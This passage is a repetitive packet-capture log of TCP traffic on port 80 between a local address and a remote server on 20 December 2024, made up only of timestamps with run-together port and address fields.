                                                              Dec 20, 2024 16:40:49.160310030 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160320997 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160367966 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.160396099 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160417080 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160458088 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.160514116 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.160586119 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.160638094 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279654980 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279696941 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279733896 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279747963 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279771090 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279782057 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279814005 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279827118 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.279912949 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.279963970 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.280028105 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.280129910 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.322437048 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.322657108 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.442337036 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.442433119 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.486892939 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.602258921 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.605964899 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:49.806293011 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:49.809834003 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.050271034 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.050340891 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.081680059 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.081912994 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.081996918 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.082010984 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.170090914 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.171880960 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201576948 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201664925 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201685905 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201775074 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201818943 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201848030 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201884031 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201909065 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.201931000 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.201984882 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.202003002 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.202054024 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.202069998 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.203846931 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.203963041 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.209346056 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.291598082 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.291634083 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.291680098 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.291717052 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321609974 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.321712971 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.321723938 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321785927 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321820974 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.321870089 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.321968079 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322071075 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.322215080 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322226048 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322365999 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.322457075 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.323698044 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.323781013 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.323944092 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324026108 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324120998 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324245930 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324258089 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324270010 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324345112 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324522018 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.324909925 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329365969 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329405069 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329531908 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329541922 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329754114 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329790115 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.329998016 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330112934 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330125093 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330149889 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330401897 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330476999 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330542088 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330552101 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330631971 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330662012 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330756903 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330765963 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330838919 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330980062 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.330991030 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331002951 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331058979 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331068993 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331188917 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331226110 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331305027 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331321955 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331391096 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331456900 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331532955 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331542969 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331604004 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331639051 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.331808090 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.366700888 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.366780043 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.411427975 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.411464930 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.411567926 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.411628008 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442652941 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442759991 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442784071 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442795038 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.442833900 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443003893 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443042040 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443069935 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443192959 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443202972 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443391085 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443401098 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443409920 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443419933 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.443497896 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.445262909 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.445337057 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.486774921 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.486785889 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.486877918 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.486993074 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487118959 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487128973 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487267017 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487277031 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487425089 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487498045 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487610102 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487660885 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487736940 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487812996 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487878084 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.487890005 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488044977 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488055944 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488117933 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488127947 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488161087 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488202095 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488348961 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488513947 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488524914 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488683939 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488698959 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488703012 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488712072 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488723993 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488872051 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488883018 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488893032 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488903046 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488912106 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.488922119 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489031076 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489124060 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489173889 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489202023 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489212990 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489326954 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489336014 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489346981 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489463091 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489473104 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489569902 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489578962 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489717960 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489727974 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489737988 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489765882 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489775896 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.489784956 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.492221117 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.492286921 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.564779043 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.564848900 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.564858913 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565048933 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565058947 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565069914 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565082073 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565090895 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565160036 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565170050 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565181971 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565229893 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565324068 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565334082 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565390110 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565398932 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565419912 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565466881 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565557957 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565567970 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565618992 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565629005 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565687895 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565699100 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565710068 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565789938 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565823078 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565927029 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.565984964 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566046953 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566129923 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566169024 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566178083 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566293955 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566303968 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566380024 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566390038 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566443920 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566452980 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566703081 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566714048 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566725016 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566734076 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566745043 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566796064 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566832066 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566843033 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566894054 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566965103 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.566973925 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.567147970 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.567157030 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.567167997 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.567178965 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.567639112 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.567723989 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.612109900 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612126112 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612303019 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612426996 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612488985 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612499952 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612596035 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612606049 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612725973 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612778902 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.612951994 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613032103 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613123894 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613204956 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613271952 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613321066 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613394976 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613420010 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613650084 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613759041 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613799095 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613851070 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613907099 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613917112 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.613985062 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.614042997 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.614125967 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.614135981 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.614979982 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.614993095 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615003109 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615012884 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615022898 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615031958 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615041018 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615051031 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615060091 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615109921 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615119934 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615128994 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615138054 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615149021 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615158081 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615168095 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615178108 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615183115 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615191936 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615200996 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615210056 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615219116 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615228891 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615240097 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615413904 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615423918 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.615722895 CET4972080192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:40:50.687587976 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687603951 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687655926 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687665939 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687685013 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687799931 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687813044 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687846899 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687891006 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687966108 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687980890 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.687989950 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688003063 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688013077 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688077927 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688134909 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688144922 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688200951 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688241005 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688250065 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688319921 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688400030 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688409090 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688419104 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688488007 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688498020 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688563108 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688572884 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688585043 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688669920 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688678980 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688728094 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688780069 CET8049720147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:40:50.688839912 CET8049720147.45.113.159192.168.2.5
